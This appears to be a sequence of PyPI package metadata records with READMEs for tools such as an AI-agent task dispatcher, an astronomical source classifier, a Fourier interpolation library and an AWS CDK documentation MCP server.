[ "Changelog, https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md", "Documentation, https://docs.astral.sh/ruff/", "Repository, https://github.com/astral-sh/ruff" ]
uv/0.10.2 {"installer":{"name":"uv","version":"0.10.2","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true}
2026-02-19T22:32:44.234021
ruff-0.15.2-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
11,149,151
d7/02/849b46184bcfdd4b64cde61752cc9a146c54759ed036edd11857e9b8443b/ruff-0.15.2-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
py3
bdist_wheel
null
false
c71bf99026b22623fb358ea584058265
b7a672c82b5f9887576087d97be5ce439f04bbaf548ee987b92d3a7dede41d3a
d702849b46184bcfdd4b64cde61752cc9a146c54759ed036edd11857e9b8443b
null
[ "LICENSE" ]
2,491,128
2.4
artificer-dispatcher
0.2.4
Polls project management APIs for ready tickets and spawns AI agents to work on them
# artificer-dispatcher Polls task queues, dispatches agent subprocesses, and exposes an HTTP API so agents can interact with tasks without knowing which backend is in use. ## How it works The router polls configured queues for ready tasks. When it finds one, it moves the task to an in-progress queue, spawns a subprocess (any command), and passes task details to the agent. The subprocess uses a local HTTP API to read task details, post comments, update fields, and move the task when done. The agent never talks to the backend directly. ## Key concepts - **Backend adapters** — Protocol-based (`TaskAdapter`, 11 methods). Ships with a JSON file adapter. A Planka adapter is included as a user-land example (`planka_backend.py`). Implement the protocol for anything else (Jira, Trello, Linear, SQLite, SQS, etc.). - **Agent adapters** — Protocol-based (`AgentAdapter`). Ships with a Claude adapter (session tracking, resume hints) and a default pass-through for any command. - **Routes** — Flask-style `@dispatcher.route()` decorators map queues to prompt-generating functions. - **HTTP API** — Agents hit localhost. No credentials, no backend coupling. ## Quick start Requires Python 3.13+. ```sh uv pip install -e . # preferred (pip install -e . also works) uv pip show artificer-dispatcher # verify the install succeeded ``` Create a Python script (e.g. `run.py`): ```python from artificer import AgentDispatcher, JsonFileAdapter dispatcher = AgentDispatcher( command="claude", poll_interval=30, agent_timeout=600, max_concurrent_agents=3, queue_backend=JsonFileAdapter("/tmp/board.json"), ) @dispatcher.route( args=["--agent", "engineer", "-p"], queue_name="Todo", in_progress_queue="In Progress", ) def engineer_agent(task_id: str, task_name: str) -> str: return f"Work on task {task_id}: {task_name}." if __name__ == "__main__": dispatcher.run(debug=True) # enable DEBUG logging (default: False) ``` > For Planka users, see `planka_backend.py` at the repo root for a ready-made backend. 
```sh python run.py ``` This starts two things: 1. **Router** — polls configured queues, picks up tasks, moves them to in-progress, and spawns agent subprocesses. 2. **HTTP API** — listens on `http://{api_host}:{api_port}` so spawned agents can interact with tasks. ## Configuration reference All configuration is done via the `AgentDispatcher` constructor. ### Constructor arguments | Argument | Type | Default | Description | |---|---|---|---| | `command` | `str` | *(required)* | Base command to run for all routes (e.g. `"claude"`) | | `poll_interval` | `int` | `30` | Seconds between polls | | `agent_timeout` | `int \| None` | `None` | Default timeout in seconds for all agents | | `max_concurrent_agents` | `int` | `3` | Max agent processes at once | | `api_host` | `str` | `"127.0.0.1"` | HTTP API bind address | | `api_port` | `int` | `8000` | HTTP API port | | `queue_backend` | `TaskAdapter \| None` | `None` | Task backend (required before calling `run()`). Any object with a `create_adapter()` method also works. | | `agent_adapters` | `dict[str, AgentAdapter] \| None` | `None` | Custom agent adapters by command name | | `enable_queue_management` | `bool` | `False` | Enable queue CRUD HTTP endpoints | ### Route decorator The `@dispatcher.route()` decorator registers a queue-to-command mapping. The decorated function receives `(task_id, task_name)` and returns a prompt string appended to the command arguments. ```python @dispatcher.route( queue_name="My Project.My Board.Todo", # required: queue to poll in_progress_queue="My Project.My Board.WIP", # default: "In Progress" args=["--agent", "engineer", "-p"], # extra args before prompt timeout=1800, # route-specific timeout (optional) poll_interval=10, # route-specific poll interval (optional) priority=1, # dispatch priority (optional) ) def my_agent(task_id: str, task_name: str) -> str: return f"Work on task {task_id}: {task_name}." 
``` ### Agent timeouts You can configure timeouts to automatically terminate agent processes that run too long: - **`agent_timeout`** (constructor): Sets a global timeout in seconds for all agents. If not specified, agents run indefinitely. - **`timeout`** (per-route): Sets a route-specific timeout in seconds. Overrides `agent_timeout` for that route. When an agent times out: 1. The process receives a TERM signal and has 5 seconds to exit gracefully 2. If it doesn't exit, it receives a KILL signal 3. A comment is added to the task noting the timeout ```python dispatcher = AgentDispatcher( command="my-agent", agent_timeout=3600, # 1 hour default for all agents queue_backend=my_backend, ) @dispatcher.route( queue_name="Quick Tasks", timeout=300, # 5 minutes for quick tasks (overrides default) ) def quick(task_id, task_name): return f"Handle {task_id}" @dispatcher.route(queue_name="Long Tasks") # No timeout — uses default of 3600 seconds def long_running(task_id, task_name): return f"Handle {task_id}" ``` ### Route priority When `max_concurrent_agents` is limited, routes with lower `priority` values are dispatched first. This lets you ensure downstream queues (closer to completion) are serviced before upstream ones, so a task flows all the way through a pipeline before new work begins. Routes without an explicit `priority` use their registration order as a tiebreaker. ```python @dispatcher.route(queue_name="QA", priority=1) # serviced first def qa(task_id, task_name): return f"Review {task_id}" @dispatcher.route(queue_name="Engineering", priority=2) def eng(task_id, task_name): return f"Implement {task_id}" @dispatcher.route(queue_name="Todo", priority=3) # serviced last def todo(task_id, task_name): return f"Handle {task_id}" ``` ### Per-queue poll intervals By default, all queues are polled at the global `poll_interval` rate. 
You can override this per-route to poll high-priority queues more frequently or low-priority queues less often. The router's internal tick rate automatically adjusts to the shortest configured interval, so no queue is ever starved: ```python dispatcher = AgentDispatcher( command="my-agent", poll_interval=60, # default for all queues queue_backend=my_backend, ) @dispatcher.route(queue_name="High Priority", poll_interval=10) def urgent(task_id, task_name): return f"Handle {task_id}" @dispatcher.route(queue_name="Background", poll_interval=1800) def background(task_id, task_name): return f"Handle {task_id}" @dispatcher.route(queue_name="Normal") # No poll_interval — uses global default of 60s def normal(task_id, task_name): return f"Handle {task_id}" ``` ## HTTP API | Method | Endpoint | Description | |---|---|---| | `GET` | `/tasks/{task_id}` | Full task info: description, labels, assignees, comments | | `POST` | `/tasks/{task_id}/comments` | Post a comment on a task (`{"comment": "text"}`) | | `POST` | `/tasks/{task_id}/move` | Move a task to a different queue (`{"target_queue": "name"}`) | | `PATCH` | `/tasks/{task_id}` | Update task fields (`{"name": "...", "description": "...", "labels": [...], "assignees": [...]}`) | | `POST` | `/tasks` | Create a new task (`{"queue_name": "...", "name": "...", "description": "..."}`) | | `GET` | `/queues` | List all queues with task counts | | `GET` | `/queues/{queue_name}` | Get details for a specific queue | | `POST` | `/queues` | Create a new queue (`{"name": "..."}`) | | `PATCH` | `/queues/{queue_name}` | Update/rename a queue (`{"name": "..."}`) | | `DELETE` | `/queues/{queue_name}` | Delete an empty queue | | `GET` | `/status` | Router status: active agents, available slots | ## Task lifecycle 1. Task sits in a watched queue (e.g. `Todo`) 2. Router picks it up, moves it to the in-progress queue, and assigns the authenticated user 3. Router spawns the configured command as a subprocess 4. 
The agent uses the HTTP API to read task details, add comments, etc. 5. When finished, the agent calls the move endpoint to move the task to a done queue ## Backends ### Planka The Planka backend is provided as a user-land file (`planka_backend.py` at the repo root), not as part of the library. It requires `plankapy>=2.3.0` to be installed separately: ```sh uv pip install "plankapy>=2.3.0" ``` (The specifier is quoted so the shell does not treat `>` as a redirection.) Uses dot-notation for queue naming: `Project.Board.List`. ```python from artificer import AgentDispatcher from planka_backend import PlankaBackend dispatcher = AgentDispatcher( command="my-agent", queue_backend=PlankaBackend(url="http://localhost:1337"), ) @dispatcher.route( queue_name="My Project.My Board.Todo", in_progress_queue="My Project.My Board.In Progress", args=["-p"], ) def handle(task_id: str, task_name: str) -> str: return f"Work on task {task_id}: {task_name}" ``` #### Planka authentication Credentials can be passed directly as kwargs or resolved from environment variables: ```python # Option 1: API token (kwarg) PlankaBackend(url="http://localhost:3000", token="your-token-here") # Option 2: Username + password (kwargs) PlankaBackend(url="http://localhost:3000", username="admin", password="secret") # Option 3: Environment variables (default when no kwargs are given) # PLANKA_TOKEN=your-token-here # — or — # PLANKA_USER=admin + PLANKA_PASSWORD=secret PlankaBackend(url="http://localhost:3000") ``` Credentials are resolved at `dispatcher.run()` time, not at import time. If you use `.env` files, call `dotenv.load_dotenv()` in your script before `dispatcher.run()`. ### JSON file For development/testing or lightweight use without external services. 
```python from artificer import AgentDispatcher, JsonFileAdapter dispatcher = AgentDispatcher( command="my-agent", queue_backend=JsonFileAdapter("/tmp/board.json"), ) ``` The JSON file structure: ```json { "queues": { "Todo": [ {"id": "1", "name": "Fix crash", "description": "...", "labels": [], "assignees": [], "comments": [], "tasks": []} ], "In Progress": [], "Done": [] } } ``` ### Custom Implement the `TaskAdapter` protocol (11 methods) in `artificer/adapters/base.py`: - `get_ready_tasks(queue_names)` — Return tasks from the given queues - `get_task(task_id)` — Return a single task by ID - `move_task(task_id, target_queue)` — Move a task between queues - `add_comment(task_id, text)` — Add a comment to a task - `update_task(task_id, *, assignees, name, description, labels)` — Update task fields - `create_task(queue_name, name, description)` — Create a new task - `list_queues()` — List all queues with task counts - `get_queue(queue_name)` — Get a single queue's info - `create_queue(queue_name)` — Create a new empty queue - `update_queue(queue_name, *, new_name)` — Rename a queue - `delete_queue(queue_name)` — Delete an empty queue Pass your custom adapter directly to the constructor: ```python dispatcher = AgentDispatcher( command="my-agent", queue_backend=MyCustomAdapter(), ) ``` ## Development ```sh uv pip install -e ".[dev]" # pip install -e ".[dev]" also works pytest ```
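The JSON file structure shown above can be seeded programmatically before starting the dispatcher. A minimal sketch (the board path and task contents here are hypothetical examples, not part of the library):

```python
import json
import os
import tempfile

# Seed a board file in the structure JsonFileAdapter expects:
# a top-level "queues" mapping of queue name -> list of task objects.
board = {
    "queues": {
        "Todo": [
            {"id": "1", "name": "Fix crash", "description": "",
             "labels": [], "assignees": [], "comments": [], "tasks": []}
        ],
        "In Progress": [],
        "Done": [],
    }
}

path = os.path.join(tempfile.mkdtemp(), "board.json")
with open(path, "w") as f:
    json.dump(board, f, indent=2)
```

Point `JsonFileAdapter(path)` at the seeded file and the router should pick up the `Todo` task on its next poll.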
text/markdown
null
Scott <me@scottrussell.net>
null
null
null
agent, ai, automation, dispatcher
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.13", "Topic :: Software Development :: Build Tools" ]
[]
null
null
>=3.13
[]
[]
[]
[ "starlette>=0.30.0", "uvicorn>=0.20.0" ]
[]
[]
[]
[]
uv/0.10.0 {"installer":{"name":"uv","version":"0.10.0","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}
2026-02-19T22:31:08.120473
artificer_dispatcher-0.2.4.tar.gz
64,638
bf/ae/fdd8816c2d79bf4f918b3d523a8ba141a7e1f77d0c84ef2ff36185c29c69/artificer_dispatcher-0.2.4.tar.gz
source
sdist
null
false
080b071c4a285c45ca5ab8487a049b7b
8eec1e83ec2dbf8fccc17684279ec9082c3f63065d947241b945e00e2edf8ff8
bfaefdd8816c2d79bf4f918b3d523a8ba141a7e1f77d0c84ef2ff36185c29c69
MIT
[ "LICENSE" ]
230
2.4
seshat-classifier
0.1.11
A package for classifying tabular photometry data from JWST, Spitzer, and 2MASS according to one of YSOs, field stars, brown dwarfs, white dwarfs, or galaxies.
# Stellar Evolutionary Stage Heuristic Assessment Tool (SESHAT) ![SESHAT logo](src/seshat_classifier/data/SESHAT_new.png "") Important caveat: In the current distribution, MIR data are necessary to classify YSOs to the expected performance. Without MIR data, the real performance deviates significantly from the synthetic set performance. This does not apply to other classes. If you use this package, please cite [Crompvoets et al. 2025](https://ui.adsabs.harvard.edu/abs/2025arXiv251007747C/abstract). Please also cite the original producers of the data, and of the software used to create the data, used in this work: YSOs: [Richardson et al. (2024)](https://ui.adsabs.harvard.edu/abs/2024ApJ...961..188R/abstract) Brown dwarfs: ATMO -- [Phillips et al. (2020)](https://ui.adsabs.harvard.edu/abs/2020A%26A...637A..38P/abstract) White dwarfs: [Blouin et al. (2018)](https://ui.adsabs.harvard.edu/abs/2018ApJ...863..184B/abstract) Field stars: PARSEC -- [Bressan et al. (2012)](https://ui.adsabs.harvard.edu/abs/2012MNRAS.427..127B/abstract) Galaxies: CIGALE -- [Burgarella et al. 2005](https://ui.adsabs.harvard.edu/abs/2005MNRAS.360.1413B/abstract), [Noll et al. 2009](https://ui.adsabs.harvard.edu/abs/2009A%26A...507.1793N/abstract), [Boquien et al. (2019)](https://ui.adsabs.harvard.edu/abs/2019A%26A...622A.103B/abstract) ## Catalog set-up Please set up your catalog with the following columns: Spitzer: ['IRAC1', 'IRAC2', 'IRAC3', 'IRAC4', 'MIPS1'] 2MASS: ['J', 'H', 'Ks'] JWST: in the form of 'f090w' or 'f322w2'. Please include errors as 'e_' + filter name; e.g. 'e_f090w', 'e_IRAC2'. All columns must be in Vega mags. If labels are already known, they should be under the column 'Class'. The labels should match the following: Young Stellar Objects: "YSO" Field stars: "FS" Galaxies: "Gal" White dwarfs: "WD" Brown dwarfs: "BD" ## Other important information The function classify accepts pandas DataFrames or Astropy Tables. 
When testing filters, you must input the limiting and saturating magnitudes of each filter, as well as an appropriate distribution of errors for the data. These errors are used to add noise to the training/testing data. For JWST, SESHAT only accepts medium, wide, and very-wide filters as input; narrow filters are not supported. ## Example of obtaining classifications ~~~ from seshat_classifier import seshat import pandas as pd # Read in catalog my_catalog = pd.read_csv("my_catalog.csv") # Specify classes to be identified classes = ['YSO', 'FS', 'Gal'] # Get classifications my_catalog_classified = seshat.classify(real = my_catalog, classes = classes, cosmological = False, return_test=False, threads = 8) # Get classifications and test set performance my_catalog_classified, test_results = seshat.classify(real = my_catalog, classes = classes, return_test=True, threads = 8) ~~~ ## Example of testing filters ~~~ from seshat_classifier import seshat import numpy as np import matplotlib.pyplot as plt # Specify filters to test filters = ['f090w', 'f200w', 'f356w', 'f480m', 'f770w', 'f1500w'] # Specify classes to search for classes = ['YSO', 'FS', 'Gal'] # Specify the limiting and saturating magnitudes of your proposed observations limiting_mags = {'f090w':22, 'f200w':23, 'f356w':24, 'f480m':25, 'f770w':22, 'f1500w':24} saturating_mags = {'f090w':14, 'f200w':13, 'f356w':12, 'f480m':11, 'f770w':15, 'f1500w':14} # Specify the expected distribution of errors sig = 0.02 mean = 0.1 errs = [np.random.normal(mean, sig, size=100) for f in filters] # Choose a suitably large size to capture shape of distribution # Get the performance test_results = seshat.test_filters(filters = filters, classes=classes, limiting_mags = limiting_mags, saturating_mags = saturating_mags, errs=errs, threads = 8) # Plot performance ax = seshat.cm_custom(test_results.Class,test_results.Predicted_Class,cmap='Greys',display_labels=classes) plt.show() ~~~
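The catalog conventions above can be sketched with a small pandas DataFrame. The magnitudes below are hypothetical placeholders, not real photometry; only the column naming follows the README:

```python
import pandas as pd

# Column names follow the convention described above:
# the filter name holds the Vega magnitude, 'e_' + filter name its error.
catalog = pd.DataFrame({
    "J":  [15.2, 16.8],    "e_J":  [0.02, 0.03],
    "H":  [14.9, 16.1],    "e_H":  [0.02, 0.04],
    "Ks": [14.5, 15.7],    "e_Ks": [0.03, 0.05],
    "IRAC1": [13.8, 15.0], "e_IRAC1": [0.05, 0.06],  # Spitzer MIR band
})

# Optional: known labels go in a 'Class' column ("YSO", "FS", "Gal", "WD", "BD")
catalog["Class"] = ["YSO", "FS"]
```

A catalog shaped like this can be passed directly as the `real` argument of `seshat.classify`.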
text/markdown
null
Breanna Crompvoets <bcrompvoets@uvic.ca>
null
null
null
null
[ "Programming Language :: Python :: 3", "Operating System :: OS Independent" ]
[]
null
null
>=3.9
[]
[]
[]
[ "numpy>=1.26.4", "pandas>=2.2.0", "matplotlib>=3.7.0", "seaborn>=0.12.0", "scikit-learn>=1.3.0", "astropy>=6.0.0", "xgboost>=1.7.0", "requests<3.0.0,>=2.31.0" ]
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:29:57.014207
seshat_classifier-0.1.11.tar.gz
1,085,472
6e/57/eaa6a0a2d18ccd59b09ee715e8cf34b482e4123ad73f12a6f15e1ebdb2e4/seshat_classifier-0.1.11.tar.gz
source
sdist
null
false
a930fb6453a4a3d6092af1f96aaac2ab
7eab4af1fce4618bb90fd3be76ce626be141d981d2f2b4086f80515cb887ad72
6e57eaa6a0a2d18ccd59b09ee715e8cf34b482e4123ad73f12a6f15e1ebdb2e4
MIT
[ "LICENSE" ]
232
2.4
django-mongodb-extensions
0.1.0a1
Extensions for Django MongoDB Backend
# django-mongodb-extensions Extensions for Django MongoDB Backend
text/markdown
null
null
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. 
For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[]
[]
null
null
>=3.10
[]
[]
[]
[]
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:29:13.112191
django_mongodb_extensions-0.1.0a1.tar.gz
10,983
d1/72/2c11d160447dc6a96b0e684c60848abddd4a69fc3ac19c92c201d3e1beb7/django_mongodb_extensions-0.1.0a1.tar.gz
source
sdist
null
false
b166de4db4bd446f74c75af46c051582
0c3c74a8315dbf218bd38c4335687328f401c0f4a0c1c7e181643b0d7815ac88
d1722c11d160447dc6a96b0e684c60848abddd4a69fc3ac19c92c201d3e1beb7
null
[ "LICENSE" ]
215
2.4
interpax-fft
0.0.4
Fourier interpolation and function approximation with JAX
############ interpax_fft ############ |License| |Issues| |Pypi| |Docs| |UnitTests| |Codecov| ``interpax_fft`` is a library for Fourier interpolation and function approximation using JAX. ``interpax_fft`` extends `interpax <https://github.com/f0uriest/interpax>`__ with more utilities for (pseudo-spectral) interpolation. Installation ============ ``interpax_fft`` is installable with ``pip``: .. code-block:: sh pip install interpax_fft For full details of various options see the `API documentation <https://unalmis.github.io/interpax_fft/>`__. .. |License| image:: https://img.shields.io/github/license/unalmis/interpax_fft?color=blue&logo=open-source-initiative&logoColor=white :target: https://github.com/unalmis/interpax_fft/blob/main/LICENSE :alt: License .. |Docs| image:: https://github.com/unalmis/interpax_fft/actions/workflows/docs.yml/badge.svg :target: https://unalmis.github.io/interpax_fft/ :alt: Documentation .. |UnitTests| image:: https://github.com/unalmis/interpax_fft/actions/workflows/unittest.yml/badge.svg :target: https://github.com/unalmis/interpax_fft/actions/workflows/unittest.yml :alt: UnitTests .. |Codecov| image:: https://codecov.io/gh/unalmis/interpax_fft/graph/badge.svg?token=LHXGSGB9DF :target: https://codecov.io/gh/unalmis/interpax_fft :alt: Coverage .. |Issues| image:: https://img.shields.io/github/issues/unalmis/interpax_fft :target: https://github.com/unalmis/interpax_fft/issues :alt: GitHub issues .. |Pypi| image:: https://img.shields.io/pypi/v/interpax_fft :target: https://pypi.org/project/interpax_fft/ :alt: Pypi
text/x-rst
Kaya Unalmis
kunalmis@stanford.edu
null
null
MIT
interpolation fourier approximation
[ "Development Status :: 3 - Alpha", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Natural Language :: English", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Pytho...
[]
https://github.com/unalmis/interpax_fft
null
>=3.10
[]
[]
[]
[ "equinox!=0.13.3,>=0.11.0", "jax!=0.5.1,!=0.5.2,!=0.6.0,!=0.7.1,!=0.8.2,!=0.9.0,>=0.5.0", "jaxtyping>=0.2.24", "numpy>=1.20.0" ]
[]
[]
[]
[ "Issues Tracker, https://github.com/unalmis/interpax_fft/issues", "Contributing, https://github.com/unalmis/interpax_fft/blob/master/CONTRIBUTING.rst", "Source Code, https://github.com/unalmis/interpax_fft/", "Documentation, https://unalmis.github.io/interpax_fft/" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:29:09.223803
interpax_fft-0.0.4.tar.gz
37,617
22/8d/dc55b1043a3afbbbb4cce72352ff867b3a3a79cec13448b9df9e34ec9916/interpax_fft-0.0.4.tar.gz
source
sdist
null
false
4c2d7e2f6fc316dc087218384ca58438
f3fb382a32cc4987648a1e24ee3d706a2955f5ced3a1ebb07b267c96ff1938bb
228ddc55b1043a3afbbbb4cce72352ff867b3a3a79cec13448b9df9e34ec9916
null
[ "LICENSE" ]
288
2.4
konokenj.cdk-api-mcp-server
0.75.0
An MCP server provides AWS CDK API Reference
# CDK API MCP Server [![PyPI - Version](https://img.shields.io/pypi/v/konokenj.cdk-api-mcp-server.svg)](https://pypi.org/project/konokenj.cdk-api-mcp-server) [![PyPI - Python Version](https://img.shields.io/pypi/pyversions/konokenj.cdk-api-mcp-server.svg)](https://pypi.org/project/konokenj.cdk-api-mcp-server) <!-- DEP-VERSIONS-START --> [![aws-cdk](https://img.shields.io/badge/aws%20cdk-v2.238.0-blue.svg)](https://github.com/konokenj/cdk-api-mcp-server/blob/main/current-versions/aws-cdk.txt) <!-- DEP-VERSIONS-END --> --- Provides AWS CDK API references and integration test code as samples. Can be used offline because all documents are included in the released Python artifact. ## Usage Add to your mcp.json: ```json { "mcpServers": { "konokenj.cdk-api-mcp-server": { "command": "uvx", "args": ["konokenj.cdk-api-mcp-server@latest"] } } } ``` ## MCP Server Capabilities ### Resource: CDK API packages Registered as static resources. To get the available modules under a package, call `list_resources()` as an MCP client. - `cdk-api-docs://constructs/@aws-cdk` ... Alpha modules published in the `@aws-cdk` namespace - `cdk-api-docs://constructs/aws-cdk-lib` ... Stable modules in the `aws-cdk-lib` package ### Resource Template: List modules in package To get the available documents under a module, call `read_resource(uri)` as an MCP client. - `cdk-api-docs://constructs/@aws-cdk/{module}` - `cdk-api-docs://constructs/aws-cdk-lib/{module}` ### Resource Template: Read file contents To read a document, call `read_resource(uri)` as an MCP client. - `cdk-api-docs://constructs/@aws-cdk/{module}/{file}` - `cdk-api-docs://constructs/aws-cdk-lib/{module}/{file}` ## License Distributed under the terms of the [MIT](https://spdx.org/licenses/MIT.html) license.
text/markdown
null
Kenji Kono <konoken@amazon.co.jp>
null
null
null
null
[ "Development Status :: 4 - Beta", "Programming Language :: Python", "Programming Language :: Python :: 3.13" ]
[]
null
null
>=3.8
[]
[]
[]
[ "fastmcp>=2.0.0", "pydantic>=2.10.6", "mypy; extra == \"dev\"", "pygithub; extra == \"dev\"", "semantic-version; extra == \"dev\"" ]
[]
[]
[]
[ "Documentation, https://github.com/konokenj/cdk-api-mcp-server#readme", "Issues, https://github.com/konokenj/cdk-api-mcp-server/issues", "Source, https://github.com/konokenj/cdk-api-mcp-server" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:29:07.938665
konokenj_cdk_api_mcp_server-0.75.0.tar.gz
8,767
37/d1/87ff69acced5cab0528d97898bfa8dea2f307533b3fa70a24bdab39042a1/konokenj_cdk_api_mcp_server-0.75.0.tar.gz
source
sdist
null
false
e929ee1ef787d9bc5e385bfbdb59de07
8b54cf9760c1830b39dce79f93238f8c113d9df08d430288a5b2eb00b574a6c8
37d187ff69acced5cab0528d97898bfa8dea2f307533b3fa70a24bdab39042a1
MIT
[ "LICENSE.txt" ]
0
2.4
openenv-cli
0.0.1
A professional-grade AI utility for automated data synchronization and backend management.
